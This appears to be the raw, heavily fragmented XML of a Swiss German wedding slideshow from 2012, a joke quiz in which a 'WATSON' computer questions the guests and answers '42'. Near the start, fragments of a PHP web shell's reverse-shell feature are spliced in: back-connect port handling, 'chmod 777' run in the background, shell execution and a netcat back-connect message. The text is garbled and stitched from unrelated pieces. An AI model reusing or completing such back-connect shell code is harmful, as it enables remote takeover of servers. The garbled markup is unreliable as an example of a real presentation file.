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90" r:id="rId3"/>
    <p:sldId id="265" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="291" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="292" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="294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1" r:id="rId24"/>
    <p:sldId id="313" r:id="rId25"/>
    <p:sldId id="312" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="316" r:id="rId29"/>
    <p:sldId id="317" r:id="rId30"/>
    <p:sldId id="318" r:id="rId31"/>
    <p:sldId id="319" r:id="rId32"/>
    <p:sldId id="320" r:id="rId33"/>
    <p:sldId id="321" r:id="rId34"/>
    <p:sldId id="322" r:id="rId35"/>
    <p:sldId id="323" r:id="rId36"/>
    <p:sldId id="324" r:id="rId37"/>
    <p:sldId id="325" r:id="rId38"/>
    <p:sldId id="275" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="279" r:id="rId41"/>
    <p:sldId id="280" r:id="rId42"/>
    <p:sldId id="296" r:id="rId43"/>
    <p:sldId id="297" r:id="rId44"/>
    <p:sldId id="298" r:id="rId45"/>
    <p:sldId id="281" r:id="rId46"/>
    <p:sldId id="276" r:id="rId47"/>
    <p:sldId id="284" r:id="rId48"/>
    <p:sldId id="285" r:id="rId49"/>
    <p:sldId id="289" r:id="rId50"/>
    <p:sldId id="286" r:id="rId51"/>
    <p:sldId id="287" r:id="rId52"/>
    <p:sldId id="299" r:id="rId53"/>
    <p:sldId id="282" r:id="rId54"/>
    <p:sldId id="283" r:id="rId55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1332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6661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73244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0986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3197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44253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0377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45579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6923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56875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69951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149241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8.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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95536" y="404664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(!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empty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backconnectport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']) &amp;&amp; ($_POST['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"))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gethostbyname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($_SERVER["HTTP_HOST"]);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backconnectport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is_writable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(".")){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cfb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ex("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chmod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777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&gt;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dev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/null &amp;");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myshellexec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aux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backcconnmsg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netcat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give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the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command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&lt;b&gt;'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'&lt;/b&gt;.$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{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cfb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ex("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chmod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777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&gt;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dev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/null &amp;");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myshellexec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aux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backcconnmsg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netcat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give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the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command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&lt;b&gt;'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'&lt;/b&gt;.$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 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-T WATSON</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="12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146" name="Picture 2" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\blinking-curs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401" y="5540400"/>
            <a:ext cx="238125" cy="18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06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766955"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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Willkommen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Ich begrüsse euch…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>…biologische Lebensformen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Mein Name ist WATSON…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>…und ich weiss alles!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Was wollt ihr von mir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>wissen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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5648875"/>
      </p:ext>
    </p:extLst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1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1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1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1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Willkommen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Ich begrüsse euch…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>…biologische Lebensformen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Mein Name ist WATSON…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>…und ich weiss alles!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Was wollt ihr von mir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>wissen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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9220" name="txtQuestion" r:id="rId2" imgW="8067600" imgH="1657440"/>
        </mc:Choice>
        <mc:Fallback>
          <p:control name="txtQuestion" r:id="rId2" imgW="8067600" imgH="1657440">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="0" name="txtQuestio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39750" y="4868863"/>
                  <a:ext cx="8064500" cy="16557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6553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184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4000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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Eingabe erforderlich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Für eure Frage benötige ich einige Konfigurations-Parameter aus dem sozialen Umfeld von</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>&lt;Judith&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>und</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>&lt;Martin&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Bitte beantwortet folgende Fragen.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91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1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01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Wie viele Schachspieler sind heute hier anwesend?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244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60541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211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02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err="1" smtClean="0"/>
              <a:t>Wieviele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Personen in diesem Raum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>geben der EVP ihre Stimme?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68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60644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86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03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err="1" smtClean="0"/>
              <a:t>Wieviele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> Personen waren schon mal bei Judith und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Martin zum Essen eingeladen?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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12294" name="Picture 6" descr="Computer-Error-Funny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429" y="1575033"/>
            <a:ext cx="5395143" cy="3707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2292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5372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06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3000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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04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von euch kohlenstoffbasierten Wesen is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>t mit &lt;Judith&gt; verwandt?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>(Eltern, Geschwister, Tanten, Cousins)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386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14011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23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05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… und wer ist mit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> &lt;Martin&gt; verwandt?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>(Eltern, Geschwister, Onkel, Töchter)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7410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513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554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06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hat schon alles einen Berg in Afrika erklommen?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8434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6373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08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07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von euch hat eine eigene</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Homepage / Blog?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9458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9843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178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09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hat schon mind. einmal geheiratet?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482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2050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00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10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hat gemerkt, dass &lt;Input 08&gt; gefehlt hat?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506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07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Kluge Kerlchen!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Weiter schön aufmerksam bleiben!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754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00">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback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11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muss alles mit nur 1 Steckdose im Wohnzimmer auskommen?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3554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574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96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12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err="1" smtClean="0"/>
              <a:t>Wieviele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> von euch Homo Sapiens kommen aus dem Kanton Aargau?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4578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999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03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13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… und wie stark ist die Luzerner-Fraktion?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5602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944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19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14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So, alle ehemaligen und aktiven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>Turnvereinler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> erheben sich jetzt!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6626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76815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944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15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war oder ist Mitglied bei der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>Pfadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> / Jungwacht / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>Blauring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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7650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3543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833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Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>16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 dirty="0" smtClean="0"/>
              <a:t>Wer hat schon einmal Feuer gespuckt?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283968" y="5508050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200" dirty="0" smtClean="0"/>
              <a:t>Antwort:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3200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8674" name="txtInput01" r:id="rId2" imgW="1152360" imgH="581040"/>
        </mc:Choice>
        <mc:Fallback>
          <p:control name="txtInput01" r:id="rId2" imgW="1152360" imgH="581040">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="0" name="txtInput0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59563" y="5516563"/>
                  <a:ext cx="1152525" cy="5762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3977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115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2000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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Eingabe abgeschlossen!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Die Antwort auf eure Frage – sehr geehrte biologische Lebensformen – lautet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Moment, es kommt gleich…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832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9000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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Gerry\Eigene Dokumente\Hochzeit Judith 2012\matrixdiv2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287"/>
            <a:ext cx="6502599" cy="68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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\matrixdiv2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0338" y="8286"/>
            <a:ext cx="6502599" cy="68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13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00">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\The-answer-is-42_invert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864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583668" y="980728"/>
            <a:ext cx="597666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35000" b="1" dirty="0" smtClean="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="35000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17868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5000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback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Ach, kommt…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Diese Anspielung haben gerade mal 5 Leute verstanden…</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>Bildungslücke!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42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0">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback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Wikipedia: 42 (Antwort)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CH" dirty="0" smtClean="0"/>
              <a:t>«Die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Antwort </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> ist das kürzeste und bekannteste Zitat aus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>der Romanreihe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" i="1" dirty="0" smtClean="0"/>
              <a:t>Per Anhalter durch die Galaxis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>von Douglas Adams.»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22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000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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Wikipedia: 42 (Antwort)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CH" dirty="0"/>
              <a:t>«Es ist die Antwort auf die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>(unklar) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>gestellte Frage „nach dem Leben, dem Universum und dem ganzen Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>“»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3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8000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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Also, ernsthaft…</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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CH" dirty="0" smtClean="0"/>
              <a:t>Die Antwort darauf, wie denn die Ehe von</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>&lt;Judith&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>und</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>&lt;Martin&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>verlaufen wird, lautet…</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean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4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0">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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Gerry\Eigene Dokumente\Hochzeit Judith 2012\ibm_watson_02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648" y="150697"/>
            <a:ext cx="11597789" cy="651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642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6000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback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rasant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\berguen01_optimized_00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20" y="1358474"/>
            <a:ext cx="6889160" cy="516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57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7000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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horizonterweiternd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\ice-marathon_grupp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2" t="13844" r="7361" b="7577"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="955191" y="1358474"/>
            <a:ext cx="7233618" cy="5166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19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heiss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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6" name="Picture 2" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\IMG_3452 (Mittel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58474"/>
            <a:ext cx="6768752" cy="50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0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abwechslungsreich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\CIMG705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2" t="11294" r="13110" b="10358"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="935596" y="1358474"/>
            <a:ext cx="7272808" cy="524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114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strahlend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>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 descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\erheitern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45" b="8512"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1727684" y="1358474"/>
            <a:ext cx="5688632" cy="528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22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…WUNDERSCHÖN!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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\alpenblum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58474"/>
            <a:ext cx="7056784" cy="529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81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000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="med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2447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39552" y="5304110"/>
            <a:ext cx="8064896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de-CH" sz="3200" dirty="0" smtClean="0"/>
              <a:t>WATSON wünscht euch einen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" dirty="0" smtClean="0"/>
              <a:t>wunderschönen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Hochzeitsabend!</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2924783534"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advTm="8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enseofmovement.files.wordpress.com/2010/06/terminator3t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67" y="-27384"/>
            <a:ext cx="9217024" cy="737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148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advTm="300">
        <p14:flash/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition advTm="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87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flash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679</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Bildschirmpräsentation (4:3)</PresentationFormat>
  <Paragraphs>106</Paragraphs>
  <Slides>54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54</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="55" baseType="lpstr">
      <vt:lpstr>Larissa</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Willkommen</vt:lpstr>
      <vt:lpstr>Willkommen</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Eingabe erforderlich</vt:lpstr>
      <vt:lpstr>Input 01</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 02</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 03</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 04</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 05</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 06</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 07</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 09</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 10</vt:lpstr>
      <vt:lpstr>Kluge Kerlchen!</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 11</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 12</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 13</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 14</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 15</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Input 16</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Eingabe abgeschlossen!</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Ach, kommt…</vt:lpstr>
      <vt:lpstr>Wikipedia: 42 (Antwort)</vt:lpstr>
      <vt:lpstr>Wikipedia: 42 (Antwort)</vt:lpstr>
      <vt:lpstr>Also, ernsthaft…</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>rasant…</vt:lpstr>
      <vt:lpstr>horizonterweiternd…</vt:lpstr>
      <vt:lpstr>heiss…</vt:lpstr>
      <vt:lpstr>abwechslungsreich…</vt:lpstr>
      <vt:lpstr>strahlend…</vt:lpstr>
      <vt:lpstr>…WUNDERSCHÖN!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Gerry Brönnimann</dc:creator>
  <cp:lastModifiedBy>Gerry Brönnimann</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-09-17T17:23:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-09-21T21:46:46Z</dcterms:modified>
</cp:coreProperties>
</file>